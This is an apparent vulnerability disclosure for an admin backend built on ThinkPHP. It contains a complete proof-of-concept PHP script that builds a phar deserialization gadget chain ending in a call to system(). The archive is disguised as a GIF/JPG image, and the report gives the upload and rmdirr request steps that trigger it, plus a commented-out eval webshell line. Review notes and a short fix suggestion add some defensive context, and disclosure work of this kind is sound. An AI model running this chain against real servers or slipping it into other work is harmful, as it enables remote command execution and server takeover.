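Phar deserialization vulnerability in application/admin/controller/Update.php
we can upload phar files disguised as jpg through the admin backend to further expand the attack surface: when a filesystem call later opens such a file through a phar:// path, PHP versions before 8.0 unserialize the metadata stored in the archive.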
POC:
<?php
namespace think{
/**
 * Local stand-in for the class name think\Model, declared here so the script can
 * build and serialize an object carrying that class name. Only the two
 * properties the PoC populates are declared; no framework code is loaded.
 *
 * NOTE(review): presumably the real framework class reads $append and $data when
 * it converts itself to an array or string - confirm against the deployed version.
 */
abstract class Model{
// Set in the constructor to a map from the key "aaaa" to a one-element list.
protected $append;
// Set in the constructor to a map from the same key "aaaa" to a Request object.
private $data;
function __construct(){
$this->append = ["aaaa"=>["123456"]];
$this->data = ["aaaa"=>new Request()];
}
}
/**
 * Local stand-in for the class name think\Request with the four properties the
 * PoC sets. For a reviewer the important part is the pairing of a function name
 * in $filter with a value in $param.
 *
 * NOTE(review): presumably the real class applies $filter as a callback to the
 * values in $param - confirm against the deployed version.
 */
class Request
{
protected $param;
protected $hook;
protected $filter;
protected $config;
function __construct(){
// "system" is the name of PHP's command-execution function.
$this->filter = "system";
$this->config = ["var_ajax"=>''];
// Callable array naming an isAjax method on this object. The stub does not
// define isAjax, so the name can only resolve on the real framework class.
$this->hook = ["visible"=>[$this,"isAjax"]];
// Demonstration value; presumably the Windows calculator, used as a harmless proof.
$this->param = ["calc"];
}
}
}
namespace think\process\pipes{
use think\model\Pivot;
/**
 * Local stand-in for the class name think\process\pipes\Windows. This is the
 * outermost object of the graph: the script stores one instance as the archive
 * metadata and serializes another for the printed output.
 *
 * NOTE(review): presumably the real class handles the entries of $files as file
 * paths during cleanup, which would force the Pivot object into a string
 * context - confirm against the deployed version.
 */
class Windows
{
// Set in the constructor to a one-element list holding a Pivot object.
private $files;
public function __construct()
{
$this->files=[new Pivot()];
}
}
}
namespace think\model{
use think\Model;
/**
 * Concrete subclass of the stub Model. Model is declared abstract and cannot be
 * instantiated directly, so this empty subclass is what Windows places in
 * $files; it inherits Model's constructor and the properties it fills.
 */
class Pivot extends Model
{
}
}
namespace{
use think\process\pipes\Windows;
// Builds a phar archive whose metadata is the stub object graph declared above,
// then prints a base64 copy of the same kind of graph.
// Remove a shell.jpg left by an earlier run; @ suppresses the warning when none exists.
@unlink('shell.jpg');
$phar = new Phar("shell.phar"); // the archive is created under the .phar name; nothing in this script writes shell.jpg
$phar->startBuffering();
// The stub starts with the GIF magic bytes "GIF89a", followed by the
// __HALT_COMPILER(); token. Presumably the prefix is there so that an upload
// check looking only at magic bytes sees an image. Defensive note: the
// __HALT_COMPILER token inside an uploaded "image" is a useful detection signal.
$phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
$object = new Windows();
// The next two lines are disabled experiments left by the author; they do not
// affect the generated archive.
//$object ->haha= 'eval(@$_POST[\'a\']);';
// $object ->haha= 'phpinfo();';
// The object graph is stored as the archive's metadata. PHP versions before 8.0
// unserialize this metadata when a filesystem function opens the archive through
// a phar:// path; from 8.0 on it is unserialized only on an explicit
// getMetadata() call.
$phar->setMetadata($object);
$phar->addFromString("a", "a"); // add the file to be compressed
$phar->stopBuffering();
// Prints a freshly built Windows graph in serialize() format, base64-encoded.
// This output is separate from the archive written above.
echo (base64_encode(serialize(new Windows())));
}
?>
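change the filename of the generated archive to 'shell.jpg' and upload it
final: request the rmdirr action with dirname set to a phar:// path that points at the uploaded file:
http://Youripaddress/admin.php/update/rmdirr?dirname=phar://./public/upload/menubg/613359e2251d3.jpg
The request shows that dirname reaches a filesystem call with a caller-chosen stream wrapper. The fix direction is for rmdirr to reject any dirname that contains a scheme such as phar:// and to resolve the path against an allowed base directory, and for the upload handler to validate file content rather than the extension.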